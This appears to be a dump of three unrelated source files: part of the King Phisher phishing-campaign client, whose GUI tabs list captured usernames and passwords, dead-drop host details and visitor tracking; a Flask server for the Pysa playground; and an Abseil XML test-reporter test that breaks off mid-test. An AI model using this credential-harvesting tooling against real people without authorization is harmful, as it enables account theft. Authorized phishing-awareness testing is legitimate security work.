results = self.rpc.graphql(self.table_query, {'campaign': campaign_id, 'count': count, 'cursor': page_info['endCursor']})
except errors.KingPhisherGraphQLQueryError as error:
self.logger.error('graphql error: ' + error.message)
raise
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
for edge in results['db']['campaign'][self.table_name]['edges']:
node = edge['node']
row_data = self.format_node_data(node)
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(node['id']))
gui_utilities.glib_idle_add_wait(store.append, row_data)
page_info = results['db']['campaign'][self.table_name]['pageInfo']
if self.is_destroyed.is_set():
return
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True))
self.last_load_time = time.time()
def signal_button_clicked_export(self, button):
self.export_table_to_csv()
def export_table_to_csv(self):
"""Export the data represented by the view to a CSV file."""
if not self._export_lock():
return
dialog = extras.FileChooserDialog('Export Data', self.parent)
file_name = self.config['campaign_name'] + '.csv'
response = dialog.run_quick_save(file_name)
dialog.destroy()
if not response:
self.loader_thread_lock.release()
return
destination_file = response['target_path']
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_csv(store, destination_file, columns)
self.loader_thread_lock.release()
def export_table_to_xlsx_worksheet(self, worksheet, title_format):
"""
Export the data represented by the view to an XLSX worksheet.
:param worksheet: The destination sheet for the store's data.
:type worksheet: :py:class:`xlsxwriter.worksheet.Worksheet`
:param title_format: The formatting to use for the title row.
:type title_format: :py:class:`xlsxwriter.format.Format`
"""
if not self._export_lock():
return
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_xlsx_worksheet(store, worksheet, columns, title_format, xlsx_options=self.xlsx_worksheet_options)
self.loader_thread_lock.release()
class CampaignViewDeaddropTab(CampaignViewGenericTableTab):
"""Display campaign information regarding dead drop connections."""
table_name = 'deaddrop_connections'
label_text = 'Deaddrop'
node_query = """\
query getDeaddropConnection($id: String!) {
db {
node: deaddropConnection(id: $id) {
id
deaddropDeployment { destination }
count
ip
localUsername
localHostname
localIpAddresses
firstSeen
lastSeen
}
}
}
"""
table_query = """\
query getDeaddropConnections($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
deaddrop_connections: deaddropConnections(first: $count, after: $cursor) {
total
edges {
node {
id
deaddropDeployment {
id
destination
}
count
ip
localUsername
localHostname
localIpAddresses
firstSeen
lastSeen
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Destination',
'Visit Count',
'IP Address',
'Username',
'Hostname',
'Local IP Addresses',
'First Hit',
'Last Hit'
)
def format_node_data(self, connection):
deaddrop_destination = connection['deaddropDeployment']['destination']
if not deaddrop_destination:
return None
row = (
deaddrop_destination,
connection['count'],
connection['ip'],
connection['localUsername'],
connection['localHostname'],
connection['localIpAddresses'],
connection['firstSeen'],
connection['lastSeen']
)
return row
class CampaignViewCredentialsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding submitted credentials."""
table_name = 'credentials'
label_text = 'Credentials'
node_query = """\
query getCredential($id: String!) {
db {
node: credential(id: $id) {
id
message { targetEmail }
username
password
submitted
}
}
}
"""
table_query = """\
query getCredentials($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
credentials(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
username
password
submitted
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Username',
'Password',
'Submitted'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(20, 30, 30, 30, 25),
title=label_text
)
def __init__(self, *args, **kwargs):
super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', False)
def format_node_data(self, node):
row = (
node['message']['targetEmail'],
node['username'],
node['password'],
node['submitted']
)
return row
def signal_button_toggled_show_passwords(self, button):
treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', button.get_property('active'))
class CampaignViewDashboardTab(CampaignViewGenericTab):
"""Display campaign information on a graphical dash board."""
dependencies = gui_utilities.GladeDependencies(
children=(
'box_top_left',
'box_top_right',
'box_bottom',
'scrolledwindow_top_left',
'scrolledwindow_top_right',
'scrolledwindow_bottom'
)
)
label_text = 'Dashboard'
"""The tabs label for display in the GUI."""
def __init__(self, *args, **kwargs):
super(CampaignViewDashboardTab, self).__init__(*args, **kwargs)
self.graphs = []
"""The :py:class:`.CampaignGraph` classes represented on the dash board."""
dash_ports = {
# dashboard position, (width, height)
'top_left': (380, 200),
'top_right': (380, 200),
'bottom': (760, 200)
}
for dash_port, details in dash_ports.items():
graph_name = self.config['dashboard.' + dash_port]
cls = graphs.get_graph(graph_name)
if not cls:
self.logger.warning('could not get graph: ' + graph_name)
logo_file_path = find.data_file('king-phisher-icon.svg')
if logo_file_path:
image = Gtk.Image.new_from_pixbuf(GdkPixbuf.Pixbuf.new_from_file_at_size(logo_file_path, 128, 128))
image.show()
self.gobjects['scrolledwindow_' + dash_port].add(image)
continue
graph_inst = cls(self.application, details, getattr(self, self.top_gobject).get_style_context())
self.gobjects['scrolledwindow_' + dash_port].add(graph_inst.canvas)
self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0)
self.graphs.append(graph_inst)
self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency))
GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine)
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the :py:attr:`~.last_load_time` is compared with
the :py:attr:`~.refresh_frequency` to check if the information is stale.
If the local data is not stale, this function will return without
updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if not self.application.rpc:
self.logger.warning('skipping load_campaign_information because rpc is not initialized')
return
with self.loader_thread_lock:
self._sync_loader_thread()
self.loader_thread_stop.clear()
self.loader_thread = utilities.Thread(target=self.loader_thread_routine)
self.loader_thread.daemon = True
self.loader_thread.start()
def loader_idle_routine(self):
"""The routine which refreshes the campaign data at a regular interval."""
if self.rpc and not self.loader_thread_is_running:
self.logger.debug('idle loader routine called')
self.load_campaign_information()
return True
def loader_thread_routine(self):
"""The loading routine to be executed within a thread."""
if not 'campaign_id' in self.config:
return
if not self.application.get_graphql_campaign():
return
info_cache = {}
for graph in self.graphs:
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
info_cache.update(gui_utilities.glib_idle_add_wait(lambda g=graph: g.refresh(info_cache, self.loader_thread_stop)))
else:
self.last_load_time = time.time()
class CampaignViewVisitsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding incoming visitors."""
table_name = 'visits'
label_text = 'Visits'
node_query = """\
query getVisit($id: String!) {
db {
node: visit(id: $id) {
id
message { targetEmail }
ip
count
userAgent
ipGeoloc { city }
firstSeen
lastSeen
}
}
}
"""
table_query = """\
query getVisits($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
visits(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
ip
count
userAgent
ipGeoloc { city }
firstSeen
lastSeen
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'IP Address',
'Visit Count',
'Visitor User Agent',
'Visitor Location',
'First Visit',
'Last Visit'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 25, 15, 90, 30, 25, 25),
title=label_text
)
def format_node_data(self, node):
geo_location = UNKNOWN_LOCATION_STRING
visitor_ip = node['ip']
if visitor_ip is None:
visitor_ip = ''
else:
visitor_ip = ipaddress.ip_address(visitor_ip)
if visitor_ip.is_loopback:
geo_location = 'N/A (Loopback)'
elif visitor_ip.is_private:
geo_location = 'N/A (Private)'
elif isinstance(visitor_ip, ipaddress.IPv6Address):
geo_location = 'N/A (IPv6 Address)'
elif node['ipGeoloc']:
geo_location = node['ipGeoloc']['city']
row = (
node['message']['targetEmail'],
str(visitor_ip),
node['count'],
node['userAgent'],
geo_location,
node['firstSeen'],
node['lastSeen']
)
return row
class CampaignViewMessagesTab(CampaignViewGenericTableTab):
"""Display campaign information regarding sent messages."""
table_name = 'messages'
label_text = 'Messages'
node_query = """\
query getMessage($id: String!) {
db {
node: message(id: $id) {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
}
"""
table_query = """\
query getMessages($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
messages(first: $count, after: $cursor) {
total
edges {
node {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Sent',
'Trained',
'Department',
'Opened',
'Opener IP Address',
'Opener User Agent'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 30, 15, 20, 20, 25, 90),
title=label_text
)
def format_node_data(self, node):
department = node['companyDepartment']
if department:
department = department['name']
row = (
node['targetEmail'],
node['sent'],
('Yes' if node['trained'] else ''),
department,
node['opened'],
node['openerIp'],
node['openerUserAgent']
)
return row
class CampaignViewTab(object):
"""
The King Phisher client top-level 'View Campaign' tab. This object
manages the sub-tabs which display all the information regarding
the current campaign.
"""
def __init__(self, parent, application):
"""
:param parent: The parent window for this object.
:type parent: :py:class:`Gtk.Window`
:param application: The main client application instance.
:type application: :py:class:`Gtk.Application`
"""
self.parent = parent
self.application = application
self.config = application.config
self.logger = logging.getLogger('KingPhisher.Client.' + self.__class__.__name__)
self.box = Gtk.Box()
self.box.set_property('orientation', Gtk.Orientation.VERTICAL)
self.box.show()
self.label = Gtk.Label(label='View Campaign')
"""The :py:class:`Gtk.Label` representing this tabs name."""
self.notebook = Gtk.Notebook()
""" The :py:class:`Gtk.Notebook` for holding sub-tabs."""
self.notebook.connect('switch-page', self.signal_notebook_switch_page)
self.notebook.set_scrollable(True)
self.box.pack_start(self.notebook, True, True, 0)
self.tabs = utilities.FreezableDict()
"""A dict object holding the sub tabs managed by this object."""
current_page = self.notebook.get_current_page()
self.last_page_id = current_page
if graphs.has_matplotlib:
self.logger.info('matplotlib is installed, dashboard will be available')
dashboard_tab = CampaignViewDashboardTab(application)
self.tabs['dashboard'] = dashboard_tab
self.notebook.append_page(dashboard_tab.box, dashboard_tab.label)
else:
self.logger.warning('matplotlib is not installed, dashboard will not be available')
messages_tab = CampaignViewMessagesTab(application)
self.tabs['messages'] = messages_tab
self.notebook.append_page(messages_tab.box, messages_tab.label)
visits_tab = CampaignViewVisitsTab(application)
self.tabs['visits'] = visits_tab
self.notebook.append_page(visits_tab.box, visits_tab.label)
credentials_tab = CampaignViewCredentialsTab(application)
self.tabs['credentials'] = credentials_tab
self.notebook.append_page(credentials_tab.box, credentials_tab.label)
if self.config.get('gui.show_deaddrop', False):
deaddrop_connections_tab = CampaignViewDeaddropTab(application)
self.tabs['deaddrop_connections'] = deaddrop_connections_tab
self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label)
self.tabs.freeze()
for tab in self.tabs.values():
tab.box.show()
self.notebook.show()
def signal_notebook_switch_page(self, notebook, current_page, index):
if not hasattr(self.parent, 'rpc'):
return
#previous_page = notebook.get_nth_page(self.last_page_id)
self.last_page_id = index
for tab in self.tabs.values():
if current_page != tab.box:
continue
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information(force=False)
|
application.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-unsafe
import argparse
import json
import logging
import os
import subprocess
import tempfile
import threading
from pathlib import Path
from typing import IO, List
from flask import Flask, jsonify, request
from flask_cors import CORS
# pyre-fixme[21]: pyre cannot seem to find this module
from flask_socketio import emit, SocketIO
logging.basicConfig(
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.DEBUG,
)
LOG: logging.Logger = logging.getLogger(__name__)
CUSTOM_PYSA_MODEL_FILE: str = "custom.pysa"
WATCHMAN_CONFIG_FILE: str = ".watchmanconfig"
PYRE_CONFIG_FILE: str = ".pyre_configuration"
INPUT_FILE: str = "input.py"
def _consume(stream: IO[str]) -> str:
buffer: List[str] = []
def _consume() -> None:
while True:
line = stream.readline()
if line:
decoded = line.strip()
LOG.debug(decoded)
buffer.append(decoded)
else:
break
thread = threading.Thread(target=_consume)
thread.start()
thread.join()
return "\n".join(buffer)
class Pyre:
def __init__(self) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Starting server in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
LOG.debug("Writing watchman configuration")
watchman_configuration_path = self._directory / WATCHMAN_CONFIG_FILE
watchman_configuration_path.write_text("{}\n")
LOG.debug("Starting watchman")
subprocess.check_call(["watchman", "watch", str(self._directory)])
LOG.debug("Priming the server")
subprocess.check_call(
["pyre", "--noninteractive"],
cwd=self._directory,
)
def check(self, input: str) -> str:
LOG.debug("Running pyre check")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
with subprocess.Popen(
["pyre", "--output=json", "--noninteractive"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stderr = _consume(process.stderr)
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stdout = _consume(process.stdout)
return_code = process.wait()
if return_code > 1:
LOG.error(f"Returning error: {stderr}")
result = jsonify(errors=[stderr])
else:
errors = json.loads(stdout)
result = jsonify(data={"errors": errors, "stderr": stderr})
return result
class Pysa:
def __init__(
self, input: str, model: str = "", use_builtin_pysa_models: bool = False
) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
self._stubs: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Intializing Pysa in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
"taint_models_path": [
str(self._stubs),
os.environ["PYSA_PLAYGROUND_TAINT_MODELS"],
]
if use_builtin_pysa_models
else str(self._stubs),
"search_path": [str(self._stubs), os.environ["PYSA_PLAYGROUND_STUBS"]],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
if model:
LOG.debug("Writing custom model to pysa file")
model_path = self._stubs / CUSTOM_PYSA_MODEL_FILE
model_path.write_text(model)
LOG.debug(f"Writing code:\n{input}")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
def analyze(self) -> None:
LOG.debug("Running pysa")
with subprocess.Popen(
["pyre", "-n", "analyze"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
model_verification_errors = []
# pyre-fixme[16]: process.stderr is marked as Optional
for line in iter(process.stderr.readline, b""):
line = line.rstrip()
if line == "":
break
elif "ERROR" in line and "is not part of the environment" in line:
model_verification_errors.append(line)
elif "INFO" in line or "ERROR" in line:
if model_verification_errors:
# Emit all model verification lines together to prevent
# network overhead.
model_verification_error_output = "\n".join(
model_verification_errors
)
emit(
"pysa_results_channel",
{
"type": "output",
"line": model_verification_error_output,
},
)
LOG.debug(model_verification_error_output)
model_verification_errors = []
emit("pysa_results_channel", {"type": "output", "line": line})
LOG.debug(line)
return_code = process.wait()
if return_code != 0:
result = {"type": "finished", "result": "error"}
else:
result = {"type": "finished", "result": "ok"}
emit("pysa_results_channel", result)
def run_server(debug: bool) -> None:
application = Flask(__name__)
# You may need to modify the origin to the pyre-check website
# before deployment.
CORS(application)
socketio = SocketIO(application, cors_allowed_origins="*")
LOG.info("Initializizing the pyre server")
pyre = Pyre()
LOG.info("Pyre server is initialized, configuring application routes")
@application.route("/check", methods=["GET", "POST"])
def check() -> str:
input = (
request.args.get("input")
or request.form.get("input")
or request.json.get("input")
)
if input is None:
return jsonify(errors=["Input not provided"])
LOG.info(f"Checking `{input}`...")
return pyre.check(input)
@socketio.on("analyze", namespace="/analyze")
def analyze(json) -> None:
input = json.get("input", None)
use_builtin_pysa_models = json.get("use_builtin_pysa_models", False)
model = json.get("model", "")
if input is None:
emit(
"pysa_results_channel",
{
"type": "finished",
"result": "error",
"reason": "No code given to analyze.",
},
)
else:
pysa = Pysa(input, model, use_builtin_pysa_models)
LOG.info(f"Checking `{input}`...")
pysa.analyze()
@application.route("/")
def index() -> str:
return "404"
socketio.run(application, debug=debug)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
arguments: argparse.Namespace = parser.parse_args()
run_server(debug=arguments.debug)
|
xml_reporter_test.py
|
# Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import re
import subprocess
import sys
import tempfile
import threading
import time
import unittest
from xml.etree import ElementTree
from xml.parsers import expat
from absl import logging
from absl.testing import _bazelize_command
from absl.testing import absltest
from absl.testing import parameterized
from absl.testing import xml_reporter
from absl.third_party import unittest3_backport
import mock
import six
class StringIOWriteLn(six.StringIO):
def writeln(self, line):
self.write(line + '\n')
class MockTest(absltest.TestCase):
failureException = AssertionError
def __init__(self, name):
super(MockTest, self).__init__()
self.name = name
def id(self):
return self.name
def runTest(self):
return
def shortDescription(self):
return "This is this test's description."
# str(exception_type) is different between Python 2 and 3.
def xml_escaped_exception_type(exception_type):
return xml_reporter._escape_xml_attr(str(exception_type))
OUTPUT_STRING = '\n'.join([
r'<\?xml version="1.0"\?>',
'<testsuites name="" tests="%(tests)d" failures="%(failures)d"'
' errors="%(errors)d" time="%(run_time).1f">',
'<testsuite name="%(suite_name)s" tests="%(tests)d"'
' failures="%(failures)d" errors="%(errors)d" time="%(run_time).1f">',
' <testcase name="%(test_name)s" status="%(status)s" result="%(result)s"'
' time="%(run_time).1f" classname="%(classname)s">%(message)s',
' </testcase>',
'</testsuite>',
'</testsuites>'])
FAILURE_MESSAGE = r"""
<failure message="e" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_failure
raise AssertionError\(\'e\'\)
AssertionError: e
\]\]></failure>""".format(xml_escaped_exception_type(AssertionError))
ERROR_MESSAGE = r"""
<error message="invalid literal for int\(\) with base 10: (')?a(')?" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_error
int\('a'\)
ValueError: invalid literal for int\(\) with base 10: '?a'?
\]\]></error>""".format(xml_escaped_exception_type(ValueError))
UNICODE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_unicode_sample_failure
raise AssertionError\(u'\\xe9'\)
AssertionError: {0}
\]\]></%s>""".format(
r'\\xe9' if six.PY2 else r'\xe9',
xml_escaped_exception_type(AssertionError))
NEWLINE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_newline_message_sample_failure
raise AssertionError\(\'{2}'\)
AssertionError: {3}
\]\]></%s>""".format(
'new
line',
xml_escaped_exception_type(AssertionError),
r'new\\nline',
'new\nline')
UNEXPECTED_SUCCESS_MESSAGE = '\n'.join([
'',
r' <error message="" type=""><!\[CDATA\[Test case '
r'__main__.MockTest.unexpectedly_passing_test should have failed, '
r'but passed.\]\]></error>'])
UNICODE_ERROR_MESSAGE = UNICODE_MESSAGE % ('error', 'error')
NEWLINE_ERROR_MESSAGE = NEWLINE_MESSAGE % ('error', 'error')
class TextAndXMLTestResultTest(absltest.TestCase):
def setUp(self):
self.stream = StringIOWriteLn()
self.xml_stream = six.StringIO()
def _make_result(self, times):
timer = mock.Mock()
timer.side_effect = times
return xml_reporter._TextAndXMLTestResult(self.xml_stream, self.stream,
'foo', 0, timer)
def _assert_match(self, regex, output):
self.assertRegex(output, regex)
def _assert_valid_xml(self, xml_output):
try:
expat.ParserCreate().Parse(xml_output)
except expat.ExpatError as e:
raise AssertionError('Bad XML output: {}\n{}'.format(e, xml_output))
def _simulate_error_test(self, test, result):
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
def _simulate_failing_test(self, test, result):
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
def _simulate_passing_test(self, test, result):
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
def test_with_passing_test(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name': 'passing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name': r'passing_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest_with_dots_in_parameter_name(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', {'case': 'a.b.c'})
else:
# In Python 3 subTest uses a ChainMap to hold the parameters, but ChainMap
# does not exist in Python 2, so a list of dict is used to simulate the
# behavior of a ChainMap. This is why a list is provided as a parameter
# here.
subtest = unittest3_backport.case._SubTest(test, 'msg',
[{'case': 'a.b.c'}])
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name':
r'passing_test \[msg\] \(case='a.b.c'\)',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def get_sample_error(self):
try:
int('a')
except ValueError:
error_values = sys.exc_info()
return error_values
def get_sample_failure(self):
try:
raise AssertionError('e')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_newline_message_sample_failure(self):
try:
raise AssertionError('new\nline')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_unicode_sample_failure(self):
try:
raise AssertionError(u'\xe9')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_terminal_escape_sample_failure(self):
try:
raise AssertionError('\x1b')
except AssertionError:
error_values = sys.exc_info()
return error_values
def test_with_failing_test(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1,
'errors': 0,
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': FAILURE_MESSAGE}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_failing_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_failure())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1,
'errors': 0,
'run_time': run_time,
'test_name': r'failing_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': FAILURE_MESSAGE}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ERROR_MESSAGE}
self._assert_match(expected_re, xml)
def test_with_error_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.error_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_error())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'test_name': r'error_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ERROR_MESSAGE}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_fail_and_error_test(self):
"""Tests a failure and subsequent error within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
# This could happen in tearDown
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1, # Only the failure is tallied (because it was first).
'errors': 0,
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
# Messages from failure and error should be concatenated in order.
'message': FAILURE_MESSAGE+ERROR_MESSAGE}
self._assert_match(expected_re, xml)
def test_with_error_and_fail_test(self):
"""Tests an error and subsequent failure within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addError(test, self.get_sample_error())
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1, # Only the error is tallied (because it was first).
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
# Messages from error and failure should be concatenated in order.
'message': ERROR_MESSAGE+FAILURE_MESSAGE}
self._assert_match(expected_re, xml)
def test_with_newline_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addError(test, self.get_newline_message_sample_failure())
result.stopTest(test)
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': NEWLINE_ERROR_MESSAGE} + '\n'
self._assert_match(expected_re, xml)
def test_with_unicode_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
result.addError(test, self.get_unicode_sample_failure())
result.stopTest(test)
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': UNICODE_ERROR_MESSAGE}
self._assert_match(expected_re, xml)
def test_with_terminal_escape_error(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
